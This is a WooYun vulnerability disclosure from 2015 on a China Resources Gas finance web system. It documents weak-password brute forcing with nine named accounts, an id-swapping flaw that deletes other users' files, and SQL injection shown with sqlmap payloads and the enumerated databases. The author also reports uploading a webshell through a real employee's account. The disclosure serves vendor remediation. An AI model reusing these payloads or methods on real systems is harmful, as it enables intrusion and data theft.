当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155847

漏洞标题:华润燃气某系统存在登录缺陷可穷举用户爆破弱口令+越权删除任意文件+SQL注入(泄漏敏感信息)

相关厂商:华润燃气(集团)有限公司

漏洞作者: 路人甲

提交时间:2015-11-25 17:09

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-25: 细节已通知厂商并且等待厂商处理中
2015-11-25: 厂商已经确认,细节仅向厂商公开
2015-12-05: 细节向核心白帽子及相关领域专家公开
2015-12-15: 细节向普通白帽子公开
2015-12-25: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

没有验证码,导致可以爆破!~~~可以越权遍历没有上传未确定的文件并任意删除!~~~用户登录后发现有SQL注入,仅测试一处,其余的厂家自己排除吧!~~~

详细说明:

地址:
http://cw.crcgas.com/index.asp
一、无验证,可爆破用户弱口令
随便输入admin/123456登录抓包,然后用burpsuite对username参数做变量,top500用户,共3000组合进行爆破,获得不存在的用户,密码错误的用户,以及登录成功的用户,登录成功
也就存在123456弱口令了!~~~
然后将获得的密码不正确的用户再次对密码top100弱口令进行爆破,发现又存在两枚
最后对用户使用用户名做密码进行爆破,没想到又存在一枚!~~~测试下来共获得9枚用户弱口令,如果密码够强大,同时全部用户名在手,那么爆破出来都没有什么问题了!~~~
22日测试的时候,还可以上传xls文件,然后修改成asp就可以得到webshell了,好像今天24日就不行了,已经修复了吧~~~
今天手抖,不小心将一句话利用zhanglei的帐号登录,上传后确认了,所以会提交到zhanglei的领导那里吧,不过应该也不会怎么影响了!~~~删除吧!~~~不好意思了,zhanglei!
~~~~
作为财务系统,那么危害性还是挺大的!~~~
弱口令账户,不同的弱口令,就不写出来弱口令了!~~~管理员自己排查其他用户的弱口令吧~~~~(此处帮忙打码)

liyan
liuling
zhanglei
chenchen
huangwei
wanglijuan
wangying
wangshuai
liming


贴几个图吧!~~~

1.jpg


2.jpg


2-1.jpg


3.jpg


3-1.jpg


4.jpg


4-1.jpg


5.jpg


6.jpg


7.jpg


8.jpg


二、
可以越权删除上传的未确定的文件
用一个帐号登录上传一个文件,
http://cw.crcgas.com/cwdown.asp?id=59650
用另一个帐号上传一个文件
http://cw.crcgas.com/cwdown.asp?id=59651
获得两个上传文件的id号码!~~~
然后用第二个帐号点击取消!~~~抓包
http://cw.crcgas.com/cw1_del.asp?id=59651
修改为
http://cw.crcgas.com/cw1_del.asp?id=59650
然后go,这样就可以删除第一个帐号上传的没有确定的文件了!~~~
那么只要对id进行遍历,那么就可以越权删除所有上传没有确认的文件!~~~

1-1.jpg


1-2.jpg


1-3.jpg


1-4.jpg


1-5.jpg


1-6.jpg


三、SQL注入
登录可以找到SQL注入!~~~
注入点:
http://cw.crcgas.com/cwzc_gj.asp?id=2 (GET)
id参数存在注入,出于时间原因,还有其他的参数应该存在注入,我就不继续测试了!~~~

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 7014=7014
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=2; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=2 WAITFOR DELAY '0:0:5'--
---
[13:37:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[13:37:09] [INFO] fetching current user
[13:37:09] [INFO] retrieving the length of query output
[13:37:09] [INFO] retrieved: 9
[13:37:11] [INFO] retrieved: sq_crcgas
current user: 'sq_crcgas'
[13:37:11] [INFO] fetching current database
[13:37:11] [INFO] retrieving the length of query output
[13:37:11] [INFO] retrieved: 9
[13:37:13] [INFO] retrieved: sq_crcgas
current database: 'sq_crcgas'
[13:37:13] [INFO] testing if current user is DBA
current user is DBA: False
available databases [30]:
[*] a0103123601
[*] a0107163637
[*] a0227155438
[*] a05211243092
[*] a0526174232
[*] a0604103832
[*] a0615115402
[*] a0617184309
[*] a0627170803
[*] a07081000429
[*] a08041539597
[*] a1204143833
[*] a1205155319
[*] master
[*] model
[*] msdb
[*] sq_13537897696
[*] sq_crcgas
[*] sq_crcgashr
[*] sq_daerp
[*] sq_dreamson
[*] sq_haian99
[*] sq_huafei
[*] sq_Manager
[*] sq_orderSystem
[*] sq_qmmanager
[*] sq_rmis
[*] sq_yangsizhuan1
[*] sq_yongjidb
[*] tempdb
Database: sq_crcgas
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| sq_crcgas.cwup | 21387 | 财务上传的数据???
| sq_crcgas.EduTbl | 20782 |
| sq_crcgas.zcre | 13356 |
| sq_crcgas.PersonTbl | 8725 |
| sq_crcgas.AreaTbl | 2687 |
| sq_crcgas.zcuser | 1260 | 注册?资产?用户
| sq_crcgas.rere | 1127 |
| dbo.sjre | 1027 |
| sq_crcgas.cwuser | 693 | 财务用户
| sq_crcgas.reuser | 636 | RE用户
| sq_crcgas.aqre | 520 |
| sq_crcgas.address | 207 |
| dbo.cwnotefile | 164 |
| sq_crcgas.EduTb2 | 145 |
| sq_crcgas.PositionTbl | 144 |
| sq_crcgas.CompanyTbl | 111 |
| sq_crcgas.caiwu | 100 | 财务?
| sq_crcgas.EduTb3 | 90 |
| dbo.sjusers | 71 | 三九?用户
| sq_crcgas.comp | 71 |
| dbo.cwnote | 67 |
| sq_crcgas.yyre | 67 |
| sq_crcgas.yyuser | 67 | 医药?用户
| sq_crcgas.EduTb4 | 61 |
| sq_crcgas.ViewJlTbl | 59 |
| dbo.cwmessage | 37 |
| sq_crcgas.reper | 22 |
| sq_crcgas.EducateTbl | 15 |
| sq_crcgas.cwcode | 13 |
| sq_crcgas.QualificationTbl | 10 |
| sq_crcgas.WorkExpSelTbl | 10 |
| sq_crcgas.AdminTbl | 6 |
| sq_crcgas.PersonTbldd | 6 |
| sq_crcgas.MemberConfigTbl | 5 |
| sq_crcgas.PersonConfigTbl | 5 |
| sq_crcgas.PoliticalTbl | 4 |
| dbo.f2015sj | 3 |
| sq_crcgas.usersadmin | 2 | 管理员用户
| sq_crcgas.SiteConfigTbl | 1 |
+----------------------------+---------+


可以获取财务、管理员的帐号密码!~~~那么登录进去后果很严重!~~~
发现大量的密码都是弱口令。

2-1.jpg


2-2.jpg


3.jpg


4.jpg


测试到此,就不继续了!~~~

漏洞证明:

3.jpg


4.jpg

修复方案:

你们知道的

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-11-25 17:23

厂商回复:

感谢提交,不过如果早提交就没前面那个了,不过这个系统研发人员估计不懂安全

最新状态:

暂无